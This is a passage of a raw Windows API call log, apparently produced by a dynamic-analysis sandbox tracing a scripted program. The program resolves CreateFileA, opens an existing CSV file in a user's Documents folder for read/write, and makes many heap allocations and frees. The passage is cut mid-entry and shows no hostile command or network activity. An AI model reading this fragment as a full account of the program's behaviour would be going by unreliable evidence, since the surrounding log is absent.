Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.458] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0172.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd5d0 [0172.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd5d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0172.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.459] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0172.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd5d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.459] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0172.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0172.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa4f8 [0172.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", cchWideChar=69, lpMultiByteStr=0x9aa4f8, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpUsedDefaultChar=0x0) returned 69 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.461] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\mo9b rc5.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a) returned 0x8edfa0 [0172.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=69, lpWideCharStr=0x8edfa0, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv") returned 69 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.465] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.467] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0172.467] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.469] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.470] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 